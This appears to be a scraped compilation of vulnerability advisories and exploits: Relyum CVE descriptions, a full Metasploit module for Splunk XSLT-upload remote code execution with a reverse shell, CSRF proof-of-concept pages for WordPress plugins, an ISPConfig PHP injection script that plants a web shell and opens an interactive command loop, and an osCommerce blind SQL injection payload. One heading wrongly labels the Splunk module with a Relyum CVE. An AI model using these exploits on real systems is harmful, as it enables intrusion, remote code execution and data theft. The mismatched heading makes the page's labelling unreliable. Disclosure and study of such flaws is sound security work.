Relyum RELY-PCIe 22.2.1 devices suffer from a system group misconfiguration, allowing read access to the central password hash file of the operating system.

**\[Suggested description\] CVE-2023-47573**

A vulnerability has been identified in Relyum RELY-PCIe 22.2.1 devices. The authorization mechanism is not enforced in the web interface, allowing a low-privileged user to execute administrative functions.

*   **Vulnerability Type:** Incorrect Access Control
*   **Vendor of Product:** System-on-Chip engineering S.L.
*   **Affected Product Code Base:** RELY-PCIe – 22.2.1
*   **Affected Component:** Web server of the equipment
*   **Attack Type:** Remote
*   **Impact:** Escalation of Privileges
*   **Attack Vectors:** An attacker can change settings, including administrative passwords.
*   **Vendor Confirmation:** True
*   **Discoverer:** Michael Messner

**\[Suggested description\] CVE-2023-47574**

A vulnerability exists in Relyum RELY-PCIe 22.2.1 and RELY-REC 23.1.0 devices due to a Weak SMB configuration with signing disabled.

*   **Vulnerability Type:** Incorrect Access Control
*   **Vendor of Product:** System-on-Chip engineering S.L.
*   **Affected Product Code Base:** RELY-PCIe – 22.2.1, RELY-REC – 23.1.0
*   **Attack Type:** Remote
*   **Impact:** Information Disclosure
*   **Attack Vectors:** Possible man-in-the-middle attacks.
*   **Vendor Confirmation:** True
*   **Discoverer:** Michael Messner

**\[Suggested description\] CVE-2023-47575**

Relyum RELY-PCIe 22.2.1 and RELY-REC 23.1.0 devices are vulnerable to reflected XSS in their web interfaces.

*   **Vulnerability Type:** Cross Site Scripting (XSS)
*   **Vendor of Product:** System-on-Chip engineering S.L.
*   **Affected Product Code Base:** RELY-PCIe – 22.2.1, RELY-REC – 23.1.0
*   **Affected Component:** Impact on web visualization
*   **Attack Type:** Remote
*   **CVE Impact:** Other (impact on web visualization)
*   **Attack Vectors:** Attacker can perform arbitrary actions on the web application.
*   **Vendor Confirmation:** True
*   **Discoverer:** Michael Messner

**\[Suggested description\] CVE-2023-47576**

A vulnerability is present in Relyum RELY-PCIe 22.2.1 and RELY-REC 23.1.0 devices, allowing authenticated command injection through the web interface.

*   **Vulnerability Type:** Command Injection
*   **Vendor of Product:** System-on-Chip engineering S.L.
*   **Affected Product Code Base:** RELY-PCIe – 22.2.1, RELY-REC – 23.1.0
*   **Affected Component:** Web server of the equipment
*   **Attack Type:** Remote
*   **Impact:** Code execution, Escalation of Privileges
*   **Attack Vectors:** Attacker can execute commands as the www-data system user.
*   **Vendor Confirmation:** True
*   **Discoverer:** Michael Messner

**\[Suggested description\] CVE-2023-47577**

Relyum RELY-PCIe 22.2.1 and RELY-REC 23.1.0 devices have a vulnerability where there is no check for the current password, allowing unauthorized password changes.

*   **Vulnerability Type:** No Check for Current Password
*   **Vendor of Product:** System-on-Chip engineering S.L.
*   **Affected Product Code Base:** RELY-PCIe – 22.2.1, RELY-REC – 23.1.0
*   **Affected Component:** Web, Command Line Interface
*   **Attack Type:** Remote
*   **Impact:** Escalation of Privileges
*   **Attack Vectors:** Attacker can change passwords without knowing the current password.
*   **Vendor Confirmation:** True
*   **Discoverer:** Michael Messner

**\[Suggested description\] CVE-2023-47578**

Relyum RELY-PCIe 22.2.1 and RELY-REC 23.1.0 devices are susceptible to Cross Site Request Forgery (CSRF) attacks due to the absence of CSRF protection in the web interface.

*   **Vulnerability Type:** Cross Site Request Forgery (CSRF)
*   **Vendor of Product:** System-on-Chip engineering S.L.
*   **Affected Product Code Base:** RELY-PCIe – 22.2.1, RELY-REC – 23.1.0
*   **Affected Component:** Web interface
*   **Attack Type:** Remote
*   **CVE Impact:** Other (CSRF)
*   **Attack Vectors:** Attacker can force the victim to perform actions without detection, potentially combined with other vulnerabilities.
*   **Vendor Confirmation:** True
*   **Discoverer:** Michael Messner

**\[Suggested description\] CVE-2023-47579**

Relyum RELY-PCIe 22.2.1 devices suffer from a system group misconfiguration, allowing read access to the central password hash file of the operating system.

*   **Vulnerability Type:** Incorrect Access Control, Misconfiguration
*   **Vendor of Product:** System-on-Chip engineering S.L.
*   **Affected Product Code Base:** RELY-PCIe – 22.2.1
*   **Attack Type:** Remote
*   **Impact:** Escalation of Privileges
*   **Attack Vectors:** Password hashes extraction via other vulnerabilities.
*   **Vendor Confirmation:** True
*   **Discoverer:** Michael Messner

**\[Suggested description\] CVE-2021-44142, CVE-2017-7494, and CVE-2015-3200**

Relyum devices use outdated software components with known vulnerabilities, leaving them exposed to potential exploits.

*   **Vulnerability Type:** Outdated Software Components
*   **Vendor of Product:** System-on-Chip engineering S.L.
*   **Affected Product Code Base:** RELY-PCIe – 22.2.1, RELY-REC – 23.1.0
*   **Affected Component:** Relyum-outdated software components with known vulnerabilities
*   **Attack Type:** Remote
*   **CVE Impact:** None
*   **Attack Vectors:** Remote compromise of the device (depends on the vulnerable component and the configuration).
*   **Vendor Confirmation:** True
*   **Discoverer:** Michael Messner

CVE-2023-47579: Vulnerability Report

This Metasploit module exploits a remote code execution vulnerability in Splunk Enterprise. The affected versions include 9.0.x before 9.0.7 and 9.1.x before 9.1.2. The exploitation process leverages a weakness in the XSLT transformation functionality of Splunk. Successful exploitation requires valid credentials, typically admin:changeme by default. The exploit involves uploading a malicious XSLT file to the target system. This file, when processed by the vulnerable Splunk server, leads to the execution of arbitrary code. The module then utilizes the runshellscript capability in Splunk to execute the payload, which can be tailored to establish a reverse shell. This provides the attacker with remote control over the compromised Splunk instance. The module is designed to work seamlessly, ensuring successful exploitation under the right conditions.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Splunk Authenticated XSLT Upload RCE',        'Description' => %q{          This Metasploit module exploits a Remote Code Execution (RCE) vulnerability in Splunk Enterprise.          The affected versions include 9.0.x before 9.0.7 and 9.1.x before 9.1.2. The exploitation process leverages          a weakness in the XSLT transformation functionality of Splunk. Successful exploitation requires valid          credentials, typically 'admin:changeme' by default.          The exploit involves uploading a malicious XSLT file to the target system. This file, when processed by the          vulnerable Splunk server, leads to the execution of arbitrary code. The module then utilizes the 'runshellscript'          capability in Splunk to execute the payload, which can be tailored to establish a reverse shell. This provides          the attacker with remote control over the compromised Splunk instance. The module is designed to work          seamlessly, ensuring successful exploitation under the right conditions.        },        'Author' => [          'nathan', # Writeup and PoC          'Valentin Lobstein', # Metasploit module          'h00die', # Assistance in module development        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2023-46214'],          ['URL', 'https://github.com/nathan31337/Splunk-RCE-poc'],          ['URL', 'https://advisory.splunk.com/advisories/SVD-2023-1104'], # Vendor Advisory          ['URL', 'https://blog.hrncirik.net/cve-2023-46214-analysis'], # Writeup        ],        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_PHP, ARCH_CMD],        'Targets' => [['Automatic', {}]],        'DisclosureDate' => '2023-11-28',        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8000        },        'Privileged' => false,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        OptString.new('USERNAME', [true, 'Username for Splunk', 'admin']),        OptString.new('PASSWORD', [true, 'Password for Splunk', 'changeme']),        OptString.new('RANDOM_FILENAME', [false, 'Random filename with 8 characters', Rex::Text.rand_text_alpha(8)]),      ]    )  end  def exploit    cookie_string ||= authenticate    unless cookie_string      fail_with(Failure::NoAccess, 'Authentication failed')    end    sleep(0.3)    csrf_token, updated_cookie_string = fetch_csrf_token(cookie_string)    unless csrf_token      fail_with(Failure::NoAccess, 'Failed to obtain CSRF token')    end    sleep(0.3)    malicious_xsl = generate_malicious_xsl    text_value = upload_malicious_file(malicious_xsl, csrf_token, updated_cookie_string)    unless text_value      fail_with(Failure::Unknown, 'File upload failed')    end    sleep(0.3)    jsid = get_job_search_id(csrf_token, updated_cookie_string)    unless jsid      fail_with(Failure::Unknown, 'Creating job failed')    end    sleep(0.3)    unless trigger_xslt_transform(jsid, text_value, updated_cookie_string)      fail_with(Failure::Unknown, 'XSLT Transform failed')    end    sleep(0.3)    unless trigger_payload(jsid, csrf_token, updated_cookie_string)      fail_with(Failure::Unknown, 'Failed to execute reverse shell')    end  end  def check    unless splunk?      return CheckCode::Unknown('Target does not appear to be a Splunk instance')    end    begin      cookie_string = authenticate    rescue RuntimeError      cookie_string = nil    end    unless cookie_string      return CheckCode::Detected('The target is Splunk but authentication failed')    end    version = get_version_authenticated(cookie_string)    return CheckCode::Detected('Unable to determine Splunk version') unless version    if version.between?(Rex::Version.new('9.0.0'), Rex::Version.new('9.0.6')) ||       version.between?(Rex::Version.new('9.1.0'), Rex::Version.new('9.1.1'))      return CheckCode::Appears("Exploitable version found: #{version}")    end    CheckCode::Safe("Non-vulnerable version found: #{version}")  end  def trigger_payload(jsid, csrf_token, cookie_string)    return nil unless jsid && csrf_token    runshellscript_url = normalize_uri(target_uri.path, 'en-US', 'splunkd', '__raw', 'servicesNS', datastore['USERNAME'], 'search', 'search', 'jobs')    runshellscript_data = {      'search' => "|runshellscript \"#{datastore['RANDOM_FILENAME']}.sh\" \"\" \"\" \"\" \"\" \"\" \"\" \"\" \"#{jsid}\""    }    upload_headers = {      'X-Requested-With' => 'XMLHttpRequest',      'X-Splunk-Form-Key' => csrf_token,      'Cookie' => cookie_string    }    print_status("Executing payload at #{runshellscript_url}")    res = send_request_cgi(      'uri' => runshellscript_url,      'method' => 'POST',      'vars_post' => runshellscript_data,      'headers' => upload_headers    )    unless res      print_error('Failed to execute payload: No response received')      return nil    end    if res.code == 201      print_good('Payload executed successfully')      return true    end    print_error("Failed to execute payload: Server returned status code #{res.code}")    return nil  end  def trigger_xslt_transform(jsid, text_value, cookie_string)    return nil unless jsid && text_value    exploit_endpoint = normalize_uri(target_uri.path, 'en-US', 'api', 'search', 'jobs', jsid, 'results')    exploit_endpoint << "?xsl=/opt/splunk/var/run/splunk/dispatch/#{text_value}/#{datastore['RANDOM_FILENAME']}.xsl"    xslt_headers = {      'X-Splunk-Module' => 'Splunk.Module.DispatchingModule',      'Connection' => 'close',      'Upgrade-Insecure-Requests' => '1',      'Accept-Language' => 'en-US,en;q=0.5',      'Accept-Encoding' => 'gzip, deflate',      'X-Requested-With' => 'XMLHttpRequest',      'Cookie' => cookie_string    }    print_status("Triggering XSLT transformation at #{exploit_endpoint}")    res = send_request_cgi(      'uri' => exploit_endpoint,      'method' => 'GET',      'headers' => xslt_headers    )    unless res      print_error('Failed to trigger XSLT transformation: No response received')      return nil    end    if res.code == 200      print_good('XSLT transformation triggered successfully')      return true    end    print_error("Failed to trigger XSLT transformation: Server returned status code #{res.code}")    return nil  end  def generate_malicious_xsl    encoded_payload = Rex::Text.html_encode(payload.encoded)    xsl_template = <<~XSL      <?xml version="1.0" encoding="UTF-8"?>      <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:exsl="http://exslt.org/common" extension-element-prefixes="exsl">        <xsl:template match="/">          <exsl:document href="/opt/splunk/bin/scripts/#{datastore['RANDOM_FILENAME']}.sh" method="text">            <xsl:text>#{encoded_payload}</xsl:text>          </exsl:document>        </xsl:template>      </xsl:stylesheet>    XSL    xsl_template  end  def get_job_search_id(csrf_token, cookie_string)    return nil unless csrf_token    jsid_url = normalize_uri(target_uri.path, 'en-US', 'splunkd', '__raw', 'servicesNS', datastore['USERNAME'], 'search', 'search', 'jobs')    upload_headers = {      'X-Requested-With' => 'XMLHttpRequest',      'X-Splunk-Form-Key' => csrf_token,      'Cookie' => cookie_string    }    jsid_data = {      'search' => '|search test|head 1'    }    print_status("Sending job search request to #{jsid_url}")    res = send_request_cgi(      'uri' => jsid_url,      'method' => 'POST',      'vars_post' => jsid_data,      'headers' => upload_headers,      'vars_get' => { 'output_mode' => 'json' }    )    unless res      print_error('Failed to initiate job search: No response received')      return nil    end    jsid = res.get_json_document['sid']    return jsid if jsid  end  def upload_malicious_file(file_content, csrf_token, cookie_string)    unless csrf_token      print_error('CSRF token not found')      return nil    end    post_data = Rex::MIME::Message.new    post_data.add_part(file_content, 'application/xslt+xml', nil, "form-data; name=\"spl-file\"; filename=\"#{datastore['RANDOM_FILENAME']}.xsl\"")    upload_headers = {      'Accept' => 'text/javascript, text/html, application/xml, text/xml, */*',      'X-Requested-With' => 'XMLHttpRequest',      'X-Splunk-Form-Key' => csrf_token,      'Cookie' => cookie_string    }    upload_url = normalize_uri(target_uri.path, 'en-US', 'splunkd', '__upload', 'indexing', 'preview')    res = send_request_cgi(      'uri' => upload_url,      'method' => 'POST',      'data' => post_data.to_s,      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",      'headers' => upload_headers,      'vars_get' => {        'output_mode' => 'json',        'props.NO_BINARY_CHECK' => 1,        'input.path' => "#{datastore['RANDOM_FILENAME']}.xsl"      }    )    unless res      print_error('Malicious file upload failed: No response received')      return nil    end    if res.headers['Content-Type'].include?('application/json')      response_data = res.get_json_document    else      print_error('Response is not in JSON format')      return nil    end    if response_data.empty?      print_error('Failed to parse JSON or received empty JSON')      return nil    end    if response_data['messages'] && !response_data['messages'].empty?      text_value = response_data.dig('messages', 0, 'text')      if text_value.include?('concatenate')        print_error('Server responded with an error: concatenate found in the response')        return nil      end      print_good('Malicious file uploaded successfully')      return text_value    end    print_error('Server did not return a valid "messages" field')    return nil  end  def fetch_csrf_token(cookie_string)    print_status('Extracting CSRF token from cookies')    csrf_token_match = cookie_string.match(/splunkweb_csrf_token_8000=([^;]+)/)    if csrf_token_match      csrf_token = csrf_token_match[1]      print_good("CSRF token successfully extracted: #{csrf_token}")      en_us_url = normalize_uri(target_uri.path, 'en-US', 'app', 'launcher', 'home')      res = send_request_cgi({        'method' => 'GET',        'uri' => en_us_url,        'cookie' => cookie_string      })      updated_cookie_string = cookie_string      if res && res.code == 200        new_cookies = res.get_cookies        updated_cookie_string += new_cookies      end      return [csrf_token, updated_cookie_string]    end    fail_with(Failure::NotFound, 'CSRF token not found in cookies')  end  def get_version_authenticated(cookie_string)    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/en-US/splunkd/__raw/services/authentication/users/', datastore['USERNAME']),      'vars_get' => {        'output_mode' => 'json'      },      'headers' => {        'Cookie' => cookie_string      }    })    return nil unless res&.code == 200    body = res.get_json_document    Rex::Version.new(body.dig('generator', 'version'))  end  def splunk?    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/en-US/account/login')    })    return true if res&.body =~ /Splunk/    false  end  def authenticate    login_url = normalize_uri(target_uri.path, 'en-US', 'account', 'login')    res = send_request_cgi({      'method' => 'GET',      'uri' => login_url    })    unless res      fail_with(Failure::Unreachable, 'No response received for authentication request')    end    cval_value = res.get_cookies.match(/cval=([^;]*)/)[1]    unless cval_value      fail_with(Failure::UnexpectedReply, 'Failed to retrieve the cval cookie for authentication')    end    auth_payload = {      'username' => datastore['USERNAME'],      'password' => datastore['PASSWORD'],      'cval' => cval_value,      'set_has_logged_in' => 'false'    }    res = send_request_cgi({      'method' => 'POST',      'uri' => login_url,      'cookie' => res.get_cookies,      'vars_post' => auth_payload    })    unless res && res.code == 200      fail_with(Failure::NoAccess, 'Failed to authenticate on the Splunk instance')    end    print_good('Successfully authenticated on the Splunk instance')    res.get_cookies  endend

Splunk XSLT Upload Remote Code Execution

WordPress Contact Form to Any API plugin versions 1.1.6 and below suffer from a cross site request forgery vulnerability.

    # Exploit Title: WP Plugins Contact Form to Any API <= 1.1.6 - CSRF# Date: 09-12-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/contact-form-to-any-api/# Vendor Homepage: https://www.itpathsolutions.com/# Version: 1.1.6# Tested on: Windows, Linux# CVE: CVE-2023-47871# Product DescriptionContact form 7 to Any API is most powerful plugin to send cf7 data to any third party services. It can be use to send data to CRM or any REST API. Easy to use and User friendly settings. It also Save Contact Form 7 form submitted data to the database with advanced features like search and export data to csv or excel.# Vulnerability overviewThe Wordpress plugins Contact Form to Any API <= 1.1.6 is vulnerable to Cross-Site Request Forgery in the Delete All Log function. This vulnerability could lead to unauthorized deletion of API Logs.# Proof of Concept<html><body><form action="http://x.x.x.x/WP/wp-admin/admin-ajax.php" method="POST"><input type="hidden" name="action" value="cf7_to_any_api_bulk_log_delete" /><input type="submit" value="Submit request" /></form><script>history.pushState('', '', '/');document.forms[0].submit();</script></body></html># RecommendationUpgrade to version 1.1.7

WordPress Contact Form To Any API 1.1.6 Cross Site Request Forgery

WordPress TextMe SMS plugin versions 1.9.0 and below suffer from a cross site request forgery vulnerability.

    # Exploit Title: WP Plugins TextMe SMS <= 1.9.0 - CSRF# Date: 09-12-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/textme-sms-integration/# Version: 1.9.0# Tested on: Windows, Linux# CVE: CVE-2023-48287# Product DescriptionThis plugin allows you to send SMS messages from your WordPress dashboard to the site owner or to your end users.# Vulnerability overviewThe Wordpress plugins TextMe SMS <= 1.9.0 is vulnerable to Cross-Site Request Forgery in the Settings function (Account details and Contact Form 7 Events). This could allow unauthenticated users to trick authenticated users to unintentionally modify the account details and contact form 7 events. This could lead to sensitive data leakage as well as phishing attacks. # Proof of Concept<html>  <body>    <form action="http://x.x.x.x/WP/wp-admin/admin-ajax.php" method="POST">      <input type="hidden" name="action" value="tetxme_update_option_page" />      <input type="hidden" name="data" value="textme_cf7=1&textme_cf7_user=1&textme_cf7_phone_field=0123456789&textme_cf7_user_content=SMS%20Phishing%20Sample" />      <input type="submit" value="Submit request" />    </form>    <script>      history.pushState('', '', '/');      document.forms[0].submit();    </script>  </body></html># RecommendationUpgrade to version 1.9.1

WordPress TextMe SMS 1.9.0 Cross Site Request Forgery

A vulnerability has been discovered on OJS, that consists in a CSRF (Cross-Site Request Forgery) attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated.

Affected Resources

OPEN JOURNAL SYSTEMS, version 3.3.0.13.

Description

INCIBE has coordinated the publication of a vulnerability affecting OJS (OPEN JOURNAL SYSTEMS), an open source solution for the management and publication of online academic journals, in its version 3.3.0.13, which has been discovered by David Cámara Galindo, from Telefónica Tech.

This vulnerability has been assigned the following code, CVSS v3.1 base score, CVSS vector and vulnerability type CWE:

*   CVE-2023-6671: CVSS v3.1: 6.3 | CVSS: AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L | CWE-352.

Solution

There is no reported solution at this time.

Detail

*   **CVE-2023-6671**: a vulnerability has been discovered on OJS, that consists in a CSRF (Cross-Site Request Forgery) attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated.

CVE-2023-6671: Cross-Site Request Forgery on OPEN JOURNAL SYSTEMS

ISPConfig versions 4.2.11 and below suffer from a PHP code injection vulnerability in language_edit.php.

------------------------------------------------------------------------  
ISPConfig <= 3.2.11 (language_edit.php) PHP Code Injection Vulnerability  
------------------------------------------------------------------------

[-] Software Link:

https://www.ispconfig.org

[-] Affected Versions:

Version 3.2.11 and prior versions.

[-] Vulnerabilities Description:

User input passed through the "records" POST parameter to  
/admin/language_edit.php is not properly sanitized before being used  
to dynamically generate PHP code that will be executed by the  
application. This can be exploited by malicious administrator users to  
inject and execute arbitrary PHP code on the web server.

[-] Proof of Concept:

https://karmainsecurity.com/pocs/CVE-2023-46818.php  
(Packet Storm Editor Note: See bottom of this file for PoC)

[-] Solution:

Upgrade to version 3.2.11p1 or later.

[-] Disclosure Timeline:

[25/10/2023] - Vendor notified  
[26/10/2023] - Version 3.2.11p1 released  
[27/10/2023] - CVE identifier assigned  
[07/12/2023] - Publication of this advisory

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)  
has assigned the name CVE-2023-46818 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Original Advisory:

https://karmainsecurity.com/KIS-2023-13

[-] Other References:

https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/

--- CVE-2023-46818.php PoC ---

<?php

/*  
    ------------------------------------------------------------------------  
    ISPConfig <= 3.2.11 (language_edit.php) PHP Code Injection Vulnerability  
    ------------------------------------------------------------------------

    author..............: Egidio Romano aka EgiX  
    mail................: n0b0d13s[at]gmail[dot]com  
    software link.......: https://www.ispconfig.org

    +-------------------------------------------------------------------------+  
    | This proof of concept code was written for educational purpose only.    |  
    | Use it at your own risk. Author will be not responsible for any damage. |  
    +-------------------------------------------------------------------------+

    [-] Vulnerability Description:

    User input passed through the "records" POST parameter to /admin/language_edit.php is  
    not properly sanitized before being used to dynamically generate PHP code that will be  
    executed by the application. This can be exploited by malicious administrator users to  
    inject and execute arbitrary PHP code on the web server.

    [-] Original Advisory:

    https://karmainsecurity.com/KIS-2023-13  
*/

set_time_limit(0);  
error_reporting(E_ERROR);

if (!extension_loaded("curl")) die("[-] cURL extension required!\n");

if ($argc != 4) die("\nUsage: php $argv[0] <URL> <Username> <Password>\n\n");

list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];

print "[+] Logging in with username '{$user}' and password '{$pass}'\n";

@unlink('./cookies.txt');

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "{$url}login/");  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  
curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt');  
curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt');  
curl_setopt($ch, CURLOPT_POSTFIELDS, "username=".urlencode($user)."&password=".urlencode($pass)."&s_mod=login");

if (preg_match('/Username or Password wrong/i', curl_exec($ch))) die("[-] Login failed!\n");

print "[+] Injecting shell\n";

$__phpcode = base64_encode("<?php print('____'); passthru(base64_decode(\$_SERVER['HTTP_C'])); print('____'); ?>");  
$injection = "'];file_put_contents('sh.php',base64_decode('{$__phpcode}'));die;#";  
$lang_file = str_shuffle("qwertyuioplkjhgfdsazxcvbnm").".lng";

curl_setopt($ch, CURLOPT_URL, "{$url}admin/language_edit.php");  
curl_setopt($ch, CURLOPT_POSTFIELDS, "lang=en&module=help&lang_file={$lang_file}");

$res = curl_exec($ch);

if (!preg_match('/_csrf_id" value="([^"]+)"/i', $res, $csrf_id)) die("[-] CSRF ID not found!\n");  
if (!preg_match('/_csrf_key" value="([^"]+)"/i', $res, $csrf_key)) die("[-] CSRF key not found!\n");

curl_setopt($ch, CURLOPT_POSTFIELDS, "lang=en&module=help&lang_file={$lang_file}&_csrf_id={$csrf_id[1]}&_csrf_key={$csrf_key[1]}&records[%5C]=".urlencode($injection));

curl_exec($ch);

print "[+] Launching shell\n";

curl_setopt($ch, CURLOPT_URL, "{$url}admin/sh.php");  
curl_setopt($ch, CURLOPT_POST, false);

while(1)  
{  
    print "\nispconfig-shell# ";  
    if (($cmd = trim(fgets(STDIN))) == "exit") break;  
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode($cmd)]);  
    preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");  
}

ISPConfig 3.2.11 PHP Code Injection

osCommerce version 4 suffers from a remote SQL injection vulnerability.

    # Exploit Title: osCommerce 4 - SQL Injection# Exploit Author: CraCkEr# Date: 22/11/2023# Vendor: osCommerce ltd.# Vendor Homepage: https://www.oscommerce.com/# Software Link: https://demo.oscommerce.com/# Demo Link: https://demo.oscommerce.com/b2b-supermarket/# Tested on: Windows 11 Home# Impact: Database Access# CWE: CWE-89 - CWE-74 - CWE-707# CVE: CVE-2023-6579# VDB: VDB-247160## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /b2b-supermarket/shopping-cartPOST Parameter 'estimate[country_id]' is vulnerable to SQLi---Parameter: estimate[country_id] (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: estimate[country_id]=223'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z&estimate[post_code]=900001&estimate[shipping]=flat_flat&ajax_estimate=ajax_estimate&_csrf=7u6VPwL2TxKyd-mt8RufHw3nHwO95CIbzlY1L1y2BueKuf0MNs42S8pCnNybbOxmWaFUYcuwbiq8YAJVDNBHsw==----------------------------------------------POST /b2b-supermarket/shopping-cart HTTP/2estimate%5Bcountry_id%5D=[SQLi]&estimate%5Bpost_code%5D=900001&estimate%5Bshipping%5D=flat_flat&ajax_estimate=ajax_estimate&_csrf=7u6VPwL2TxKyd-mt8RufHw3nHwO95CIbzlY1L1y2BueKuf0MNs42S8pCnNybbOxmWaFUYcuwbiq8YAJVDNBHsw%3D%3D-------------------------------------------[-] Done

osCommerce 4 SQL Injection

JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/nav/update.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-49447: cms/CSRF exists at the navigation management modification location.md at main · ysuzhangbin/cms

JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/slide/update.

CVE-2023-49374: cms/There is CSRF in the rotation image editing section.md at main · li-yu320/cms

JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/friend_link/update.

Tag

#csrf